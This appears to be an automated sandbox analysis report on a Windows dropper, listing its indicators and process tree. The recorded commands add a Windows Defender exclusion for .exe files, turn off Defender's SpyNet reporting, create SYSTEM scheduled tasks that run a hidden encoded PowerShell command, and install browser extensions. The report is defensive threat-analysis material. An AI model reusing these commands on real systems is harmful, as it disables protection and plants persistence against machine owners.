Analysis
-
max time kernel
126s -
max time network
134s -
platform
windows10-1703_x64 -
resource
win10-20231020-en -
resource tags
arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system -
submitted
21-11-2023 14:23
Static task
static1
General
-
Target
ab0ebdbdb4b59ed6cfa43b51ff6f5d5afd14024550939cedd4e2344df300f167.exe
-
Size
7.3MB
-
MD5
cc6cc6577efb09e95245d8d3c4834ae2
-
SHA1
34c205a198089d939091aa416d3744856b448889
-
SHA256
ab0ebdbdb4b59ed6cfa43b51ff6f5d5afd14024550939cedd4e2344df300f167
-
SHA512
163d40b58e1bd5df285b7d75bc576ef7e0c6d31d33cff00b9f325b358efe682ff5207a52561c2f0b546ddcd394390b099b233619fa800c4aacb556c872442b29
-
SSDEEP
196608:91ODA1Ipvgf35+g72fDqxYx5NUGFGdCeGJ7JCO/Sn:3O81IM8gS7Bxf9GdC3rZSn
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 33 1044 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2508097367-364665605-1201309312-1000\Control Panel\International\Geo\Nation RBmDAqC.exe -
Executes dropped EXE 4 IoCs
pid Process 4588 Install.exe 3376 Install.exe 1564 RayojNz.exe 4280 RBmDAqC.exe -
Loads dropped DLL 1 IoCs
pid Process 1044 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json RBmDAqC.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json RBmDAqC.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini RBmDAqC.exe -
Drops file in System32 directory 33 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 RBmDAqC.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 RBmDAqC.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini RayojNz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 RBmDAqC.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B RBmDAqC.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol RayojNz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 RBmDAqC.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA RBmDAqC.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja RBmDAqC.exe File created C:\Program Files (x86)\AtBFliYUSCIU2\ujHgBPH.xml RBmDAqC.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi RBmDAqC.exe File created C:\Program Files (x86)\KcvIfpBEU\bBhnTyV.xml RBmDAqC.exe File created C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\esydlRx.xml RBmDAqC.exe File created C:\Program Files (x86)\OFVgegHnELnCC\AsRdPjH.xml RBmDAqC.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi RBmDAqC.exe File created C:\Program Files (x86)\KcvIfpBEU\zbMovH.dll RBmDAqC.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak RBmDAqC.exe File created C:\Program Files (x86)\AtBFliYUSCIU2\SzlbyMcorvnHx.dll RBmDAqC.exe File created C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\DFdhZJe.dll RBmDAqC.exe File created C:\Program Files (x86)\OFVgegHnELnCC\EsqbQDb.dll RBmDAqC.exe File created C:\Program Files (x86)\KLjJYzCUqgUn\ekUGOXy.dll RBmDAqC.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak RBmDAqC.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bSTfouYtWkypYZNMeg.job schtasks.exe File created C:\Windows\Tasks\AtBWxWZQPczPtNlnn.job schtasks.exe File created C:\Windows\Tasks\tPKRaMnTrSPPzpw.job schtasks.exe File created C:\Windows\Tasks\GZVqxQnXgrdNzWCPM.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 700 schtasks.exe 1616 schtasks.exe 8 schtasks.exe 4252 schtasks.exe 4300 schtasks.exe 4804 schtasks.exe 4496 schtasks.exe 920 schtasks.exe 512 schtasks.exe 5008 schtasks.exe 4372 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" RBmDAqC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket RBmDAqC.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache RBmDAqC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer RBmDAqC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{626007f7-0000-0000-0000-d01200000000}\NukeOnDelete = "0" RBmDAqC.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume RBmDAqC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ RBmDAqC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing RBmDAqC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{626007f7-0000-0000-0000-d01200000000}\MaxCapacity = "14116" RBmDAqC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3508 powershell.EXE 3508 powershell.EXE 3508 powershell.EXE 1980 powershell.exe 1980 powershell.exe 1980 powershell.exe 2568 powershell.exe 2568 powershell.exe 2568 powershell.exe 4624 powershell.EXE 4624 powershell.EXE 4624 powershell.EXE 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe 4280 RBmDAqC.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3508 powershell.EXE Token: SeDebugPrivilege 1980 powershell.exe Token: SeDebugPrivilege 2568 powershell.exe Token: SeDebugPrivilege 4624 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1540 wrote to memory of 4588 1540 ab0ebdbdb4b59ed6cfa43b51ff6f5d5afd14024550939cedd4e2344df300f167.exe 71 PID 1540 wrote to memory of 4588 1540 ab0ebdbdb4b59ed6cfa43b51ff6f5d5afd14024550939cedd4e2344df300f167.exe 71 PID 1540 wrote to memory of 4588 1540 ab0ebdbdb4b59ed6cfa43b51ff6f5d5afd14024550939cedd4e2344df300f167.exe 71 PID 4588 wrote to memory of 3376 4588 Install.exe 72 PID 4588 wrote to memory of 3376 4588 Install.exe 72 PID 4588 wrote to memory of 3376 4588 Install.exe 72 PID 3376 wrote to memory of 3888 3376 Install.exe 74 PID 3376 wrote to memory of 3888 3376 Install.exe 74 PID 3376 wrote to memory of 3888 3376 Install.exe 74 PID 3376 wrote to memory of 4708 3376 Install.exe 76 PID 3376 wrote to memory of 4708 3376 Install.exe 76 PID 3376 wrote to memory of 4708 3376 Install.exe 76 PID 4708 wrote to memory of 2556 4708 forfiles.exe 78 PID 4708 wrote to memory of 2556 4708 forfiles.exe 78 PID 4708 wrote to memory of 2556 4708 forfiles.exe 78 PID 3888 wrote to memory of 4468 3888 forfiles.exe 79 PID 3888 wrote to memory of 4468 3888 forfiles.exe 79 PID 3888 wrote to memory of 4468 3888 forfiles.exe 79 PID 2556 wrote to memory of 3044 2556 cmd.exe 80 PID 2556 wrote to memory of 3044 2556 cmd.exe 80 PID 2556 wrote to memory of 3044 2556 cmd.exe 80 PID 4468 wrote to memory of 3460 4468 cmd.exe 81 PID 4468 wrote to memory of 3460 4468 cmd.exe 81 PID 4468 wrote to memory of 3460 4468 cmd.exe 81 PID 2556 wrote to memory of 1888 2556 cmd.exe 82 PID 2556 wrote to memory of 1888 2556 cmd.exe 82 PID 2556 wrote to memory of 1888 2556 cmd.exe 82 PID 4468 wrote to memory of 3292 4468 cmd.exe 83 PID 4468 wrote to memory of 3292 4468 cmd.exe 83 PID 4468 wrote to memory of 3292 4468 cmd.exe 83 PID 3376 wrote to memory of 4300 3376 Install.exe 84 PID 3376 wrote to memory of 4300 3376 Install.exe 84 PID 3376 wrote to memory of 4300 3376 Install.exe 84 PID 3376 wrote to memory of 4164 3376 Install.exe 86 PID 3376 wrote to memory of 4164 3376 Install.exe 86 PID 3376 wrote to memory of 4164 3376 Install.exe 86 PID 3508 wrote to memory of 524 3508 powershell.EXE 90 PID 3508 wrote to memory of 524 3508 powershell.EXE 90 PID 3376 wrote to memory of 3928 3376 Install.exe 95 PID 3376 wrote to memory of 3928 3376 Install.exe 95 PID 3376 wrote to memory of 3928 3376 Install.exe 95 PID 3376 wrote to memory of 512 3376 Install.exe 97 PID 3376 wrote to memory of 512 3376 Install.exe 97 PID 3376 wrote to memory of 512 3376 Install.exe 97 PID 1564 wrote to memory of 1980 1564 RayojNz.exe 100 PID 1564 wrote to memory of 1980 1564 RayojNz.exe 100 PID 1564 wrote to memory of 1980 1564 RayojNz.exe 100 PID 1980 wrote to memory of 3048 1980 powershell.exe 102 PID 1980 wrote to memory of 3048 1980 powershell.exe 102 PID 1980 wrote to memory of 3048 1980 powershell.exe 102 PID 3048 wrote to memory of 2472 3048 cmd.exe 103 PID 3048 wrote to memory of 2472 3048 cmd.exe 103 PID 3048 wrote to memory of 2472 3048 cmd.exe 103 PID 1980 wrote to memory of 1788 1980 powershell.exe 104 PID 1980 wrote to memory of 1788 1980 powershell.exe 104 PID 1980 wrote to memory of 1788 1980 powershell.exe 104 PID 1980 wrote to memory of 8 1980 powershell.exe 105 PID 1980 wrote to memory of 8 1980 powershell.exe 105 PID 1980 wrote to memory of 8 1980 powershell.exe 105 PID 1980 wrote to memory of 3880 1980 powershell.exe 106 PID 1980 wrote to memory of 3880 1980 powershell.exe 106 PID 1980 wrote to memory of 3880 1980 powershell.exe 106 PID 1980 wrote to memory of 316 1980 powershell.exe 107 PID 1980 wrote to memory of 316 1980 powershell.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\ab0ebdbdb4b59ed6cfa43b51ff6f5d5afd14024550939cedd4e2344df300f167.exe"C:\Users\Admin\AppData\Local\Temp\ab0ebdbdb4b59ed6cfa43b51ff6f5d5afd14024550939cedd4e2344df300f167.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Users\Admin\AppData\Local\Temp\7zSA95F.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Users\Admin\AppData\Local\Temp\7zSABD0.tmp\Install.exe.\Install.exe /ddidHcG "385118" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4468 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:3460
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:3292
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:3044
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1888
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFLJTUGIS" /SC once /ST 08:47:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4300
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFLJTUGIS"4⤵PID:4164
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFLJTUGIS"4⤵PID:3928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bSTfouYtWkypYZNMeg" /SC once /ST 14:25:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\RayojNz.exe\" rd /oIsite_idozA 385118 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:512
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:524
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2480
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:2620
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3752
-
